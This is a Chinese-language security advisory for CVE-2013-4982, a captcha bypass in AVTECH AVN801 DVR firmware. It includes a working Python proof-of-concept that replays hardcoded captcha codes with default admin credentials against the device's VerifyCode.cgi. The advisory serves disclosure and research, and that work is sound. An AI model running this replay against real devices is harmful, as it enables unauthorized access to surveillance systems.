发布日期：2013-08-28
更新日期：2013-08-29

受影响系统：

AVTECH AVN801 DVR 4CH H.264 (AVTECH AVN801)

描述：

---

BUGTRAQ  ID: 62035
CVE(CAN) ID: CVE-2013-4982

AVTECH AVN801是数字视频录像机产品。

AVTECH AVN801在运行固件版本1017-1003-1009-1003时存在安全限制绕过漏洞，远程攻击者通过发送带有任意硬编码的验证码及匹配验证代码的多次请求，可完全绕过captcha保护。

<*来源：Facundo Pantaleo
  
  链接：http://seclists.org/fulldisclosure/2013/Aug/284
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

/-----
import httplib

ip = "192.168.1.1"
print "Performing captcha replay with hardcoded wrong captcha code and
verify code..."
conn = httplib.HTTPConnection(ip)
conn.request("GET",
"/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUA&verify_code=FMUYyLOivRpgc
HTTP/1.1")
resp = conn.getresponse()
print "Reading webpage..."
print resp.read()
print "Performing several captcha replays with hardcoded right captcha
code and verify code..."
for i in range(1, 10):
    conn = httplib.HTTPConnection(ip)
    conn.request("GET",
"/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUF&verify_code=FMUYyLOivRpgc
HTTP/1.1")
    resp = conn.getresponse()
    print "Reading webpage..."
    print resp.read()

-----/

建议：

---

厂商补丁：

AVTECH
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.avtech.com.tw/

浏览次数：3337
严重程度：0（网友投票）